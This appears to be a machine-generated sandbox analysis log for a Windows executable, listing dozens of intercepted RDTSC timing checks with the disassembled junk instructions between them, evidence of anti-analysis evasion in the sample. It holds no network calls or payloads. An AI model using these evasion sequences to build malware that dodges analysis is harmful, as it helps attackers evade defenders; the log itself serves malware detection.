Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8781 second address: 11B87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF2E5514DEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B88ED second address: 11B88F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11BE5F9 second address: 11BE64D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF2E5514DF2h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnl 00007FF2E5514DE6h 0x0000001d jmp 00007FF2E5514DF4h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007FF2E5514DECh 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13A2 second address: 11C13BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF2E55A2C2Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13BE second address: 11C13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13C2 second address: 11C13D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C26h 0x00000011 jno 00007FF2E55A2C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C13D9 second address: 11C13E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C16E3 second address: 11C16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C1877 second address: 11C187F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C52E5 second address: 11C5307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E55A2C33h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C999D second address: 11C99E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF2E5514E0Bh 0x0000000c jmp 00007FF2E5514DF7h 0x00000011 jmp 00007FF2E5514DEEh 0x00000016 jmp 00007FF2E5514DEFh 0x0000001b popad 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C99E5 second address: 11C99EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C99EF second address: 11C99FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C8C08 second address: 11C8C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C902E second address: 11C904F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2E5514DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E5514DF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C904F second address: 11C9070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF2E55A2C26h 0x00000009 jmp 00007FF2E55A2C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9070 second address: 11C907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF2E5514DECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9209 second address: 11C9217 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C9217 second address: 11C921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C921B second address: 11C9221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C935C second address: 11C9360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11C951F second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF3E4 second address: 11CF3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF3E8 second address: 11CF40E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E55A2C3Dh 0x00000008 jmp 00007FF2E55A2C37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF40E second address: 11CF419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E5514DE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDD2F second address: 11CDD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDD41 second address: 11CDD47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDEB1 second address: 11CDEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CDFE9 second address: 11CDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE2E3 second address: 11CE302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE302 second address: 11CE306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CE44F second address: 11CE461 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177ABB second address: 1177ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177BB1 second address: 1177BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177BB6 second address: 1177BD6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF0CF second address: 11CF0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11CF0DB second address: 11CF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11360A2 second address: 11360BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6420 second address: 11D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6424 second address: 11D6445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6445 second address: 11D6449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6449 second address: 11D644F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6719 second address: 11D671F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D671F second address: 11D672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D672F second address: 11D6737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D6737 second address: 11D673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D7046 second address: 11D7056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11D7384 second address: 11D7390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF2E55A2C2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0BE9 second address: 11E0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0059 second address: 11E009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C28h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF2E55A2C38h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FF2E55A2C33h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E009B second address: 11E009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E01C3 second address: 11E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E01C9 second address: 11E01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E0336 second address: 11E033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E079D second address: 11E07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07A3 second address: 11E07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07B6 second address: 11E07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07C0 second address: 11E07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF2E55A2C37h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E863F second address: 11E8653 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E5514DEAh 0x00000008 jl 00007FF2E5514DECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D66 second address: 11E6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D79 second address: 11E6D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D7D second address: 11E6DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74A3 second address: 11E74A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74A8 second address: 11E74B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74B2 second address: 11E74DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF2E5514DFFh 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74DA second address: 11E74F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74F6 second address: 11E74FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11F0D9F second address: 11F0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201D64 second address: 1201D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201D68 second address: 1201D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 120177F second address: 12017A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FF2E5514DE8h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FF2E5514DE8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007FF2E5514DE6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017A0 second address: 12017B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017B3 second address: 12017C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017C3 second address: 12017C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017C8 second address: 12017CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017CE second address: 12017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C32h 0x0000000b jbe 00007FF2E55A2C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 120191E second address: 1201937 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF2E5514DEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201937 second address: 1201951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201951 second address: 120196C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121469F second address: 12146A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12146A3 second address: 12146AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12146AD second address: 12146F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jo 00007FF2E55A2C26h 0x00000014 pop ecx 0x00000015 jmp 00007FF2E55A2C37h 0x0000001a pushad 0x0000001b jmp 00007FF2E55A2C38h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218C6A second address: 1218C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E2B second address: 1218E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E2F second address: 1218E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E35 second address: 1218E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF2E55A2C2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E43 second address: 1218E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FF2E5514DE6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E57 second address: 1218E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219121 second address: 1219125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219125 second address: 121912B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121912B second address: 121912F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121928A second address: 12192A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192A9 second address: 12192D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEFh 0x00000007 jmp 00007FF2E5514DEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192D1 second address: 12192D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192D5 second address: 12192D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219418 second address: 1219441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF2E55A2C31h 0x0000000c jmp 00007FF2E55A2C31h 0x00000011 rdtsc
